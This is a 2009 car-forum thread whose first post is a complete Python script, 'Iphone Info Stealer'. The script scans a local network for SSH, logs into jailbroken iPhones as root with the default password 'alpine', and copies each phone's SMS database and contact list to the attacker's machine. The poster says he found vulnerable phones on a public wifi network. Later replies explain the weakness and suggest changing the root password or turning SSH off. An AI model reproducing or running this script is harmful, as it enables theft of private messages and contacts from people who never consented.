# Have friends with jailbroke iPhones?

**URL:** https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897
**Category:** NYSpeed Off Topic
**Created:** [November 9, 2009, 5:31am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897 "2009-11-09T05:31:57Z")
**Posts on this page:** 12
**Page:** 1

<div class="post-metadata">

### Author: ![LZ1](https://avatars.discourse-cdn.com/v4/letter/l/7ab992/32.png) [@LZ1](https://forums.speedlife.net/u/LZ1)
#### Post date: [November 9, 2009, 5:31am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/1 "2009-11-09T05:31:57Z")

</div>

#!/usr/bin/env python

#########################################

# Program : Iphone Info Stealer

# author : cloud

# contact : cloud[at][madpowah.org](http://madpowah.org)

# website : [http://blog.madpowah.org](http://blog.madpowah.org)

# 

# You need to be connect to an Access Point.

# Launch iphonestealer.py and it will steal

# SMS and Contact list of all iphones

# jailbreaked with SSH on the network.

# 

# This program uses the lib paramiko.

# 

# I’m not responsible of the use of this

# program.

##########################################

import socket  
import sys  
import os  
import paramiko

# Modify this values

local\_file=’/home/user/where/you/want/to/store/data/’ # where you will store data  
network = “192.168.0.” # the network you want to scan

# End of modif

port = ‘ssh’  
username = ‘root’  
password = ‘alpine’  
sms\_remote = ‘/private/var/mobile/Library/SMS/sms.db’  
contact\_remote = ‘/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb’  
ip\_num = 1  
ip\_list = []

print “\>\> Iphone Info Stealer by cloud \<[cloud@madpowah.org](mailto:cloud@madpowah.org)\>”  
print “--------------------”  
sys.stdout.write("\>\> Scanning Network ")  
sys.stdout.write(network)  
sys.stdout.write(“0/24”)

while ip\_num \< 255:

```
host = network + str(ip_num)
sys.stdout.write('.')
sys.stdout.flush()

try:
	sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock1.settimeout(0.2)
	sock1.connect((host,22))
	ip_list.append(host)
	sock1.close()
except:
	sys.stdout.write('.')
	sys.stdout.flush()

ip_num += 1

```

print "

\>\> Getting SMS and Contact List"

for hostname in ip\_list:  
try:  
print ‘Testing with :’, hostname, ‘…’,  
t = paramiko.SSHClient()  
t.set\_missing\_host\_key\_policy(paramiko.AutoAddPolicy())  
t.load\_system\_host\_keys()  
t.connect(hostname, port=port, username=username, password=password)  
ftp = t.open\_sftp()  
try:  
local\_file\_ok = local\_file + hostname + ‘-sms.db’  
ftp.get(sms\_remote, local\_file\_ok)  
print “SMS STOLEN ! …”,  
except:  
print “No SMS ☹ …”,  
try:  
local\_file\_ok = local\_file + hostname + ‘-contact.db’  
ftp.get(contact\_remote, local\_file\_ok)  
print “Contact STOLEN !”  
except:  
print “No Contact List ☹ …”

```
	ftp.close()
	t.close()
except :
	print "Not an iphone"
```

---

<div class="post-metadata">

### Author: ![Tunerfreak](https://yyz2.discourse-cdn.com/flex034/user_avatar/forums.speedlife.net/tunerfreak/32/7427_2.png) [@Tunerfreak](https://forums.speedlife.net/u/Tunerfreak)
#### Post date: [November 9, 2009, 7:28am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/2 "2009-11-09T07:28:00Z")

</div>

you need SSH turned on though

---

<div class="post-metadata">

### Author: ![boardjnky4](https://avatars.discourse-cdn.com/v4/letter/b/96bed5/32.png) [@boardjnky4](https://forums.speedlife.net/u/boardjnky4)
#### Post date: [November 9, 2009, 7:30am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/3 "2009-11-09T07:30:49Z")

</div>

do jailbroken iphones have openssh on by default? If so, this is a BONEHEAD move.

---

<div class="post-metadata">

### Author: ![Tunerfreak](https://yyz2.discourse-cdn.com/flex034/user_avatar/forums.speedlife.net/tunerfreak/32/7427_2.png) [@Tunerfreak](https://forums.speedlife.net/u/Tunerfreak)
#### Post date: [November 9, 2009, 7:34am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/4 "2009-11-09T07:34:24Z")

</div>

> [@boardjnky4](#):
>
> do jailbroken iphones have openssh on by default? If so, this is a BONEHEAD move.

no you download it through cydia

---

<div class="post-metadata">

### Author: ![LZ1](https://avatars.discourse-cdn.com/v4/letter/l/7ab992/32.png) [@LZ1](https://forums.speedlife.net/u/LZ1)
#### Post date: [November 9, 2009, 7:39am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/5 "2009-11-09T07:39:26Z")

</div>

> [@boardjnky4](#):
>
> do jailbroken iphones have openssh on by default? If so, this is a BONEHEAD move.

No but on a undisclosed large public wifi network I did find two phones with it running…

---

<div class="post-metadata">

### Author: ![boxxa](https://yyz2.discourse-cdn.com/flex034/user_avatar/forums.speedlife.net/boxxa/32/5045_2.png) [@boxxa](https://forums.speedlife.net/u/boxxa)
#### Post date: [November 9, 2009, 8:35am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/6 "2009-11-09T08:35:20Z")

</div>

Not really hackerish. Just stupidity of people who leave SSH on and their default password.

:tdown:

---

<div class="post-metadata">

### Author: ![boardjnky4](https://avatars.discourse-cdn.com/v4/letter/b/96bed5/32.png) [@boardjnky4](https://forums.speedlife.net/u/boardjnky4)
#### Post date: [November 9, 2009, 8:42am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/7 "2009-11-09T08:42:08Z")

</div>

yeah, people probably needed to get a root shell to follow some instructions on lifehacker or some other dumb site where “smart nerds” go to do leet shit to their devices.

---

<div class="post-metadata">

### Author: ![boardjnky4](https://avatars.discourse-cdn.com/v4/letter/b/96bed5/32.png) [@boardjnky4](https://forums.speedlife.net/u/boardjnky4)
#### Post date: [November 9, 2009, 8:42am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/8 "2009-11-09T08:42:41Z")

</div>

> [@boxxa](#):
>
> Not really hackerish. Just stupidity of people who leave SSH on and their default password.
> 
> :tdown:

most people have NO IDEA what a root password is

---

<div class="post-metadata">

### Author: ![boardjnky4](https://avatars.discourse-cdn.com/v4/letter/b/96bed5/32.png) [@boardjnky4](https://forums.speedlife.net/u/boardjnky4)
#### Post date: [November 9, 2009, 8:43am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/9 "2009-11-09T08:43:46Z")

</div>

other than that, the only thing the above script does, is loop through every network address attempting to log in via the credentials.

---

<div class="post-metadata">

### Author: ![chino](https://avatars.discourse-cdn.com/v4/letter/c/bcef8e/32.png) [@chino](https://forums.speedlife.net/u/chino)
#### Post date: [November 9, 2009, 10:11am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/10 "2009-11-09T10:11:58Z")

</div>

> [@boardjnky4](#):
>
> most people have NO IDEA what a root password is

i always just leave that one blank, just in case i forget it :gotme:

---

<div class="post-metadata">

### Author: ![\_Karu](https://yyz2.discourse-cdn.com/flex034/user_avatar/forums.speedlife.net/_karu/32/7602_2.png) [@\_Karu](https://forums.speedlife.net/u/_Karu)
#### Post date: [November 9, 2009, 10:25am UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/11 "2009-11-09T10:25:04Z")

</div>

That’s why, just like you tag a deer after you shoot em, you gotta change your root password after you jailbreak your iPhone.

---

<div class="post-metadata">

### Author: ![djdstar](https://yyz2.discourse-cdn.com/flex034/user_avatar/forums.speedlife.net/djdstar/32/7617_2.png) [@djdstar](https://forums.speedlife.net/u/djdstar)
#### Post date: [November 10, 2009, 4:30pm UTC](https://forums.speedlife.net/t/have-friends-with-jailbroke-iphones/75897/12 "2009-11-10T16:30:32Z")

</div>

on SBSettings you can just toggle SSH off, its easy as shit
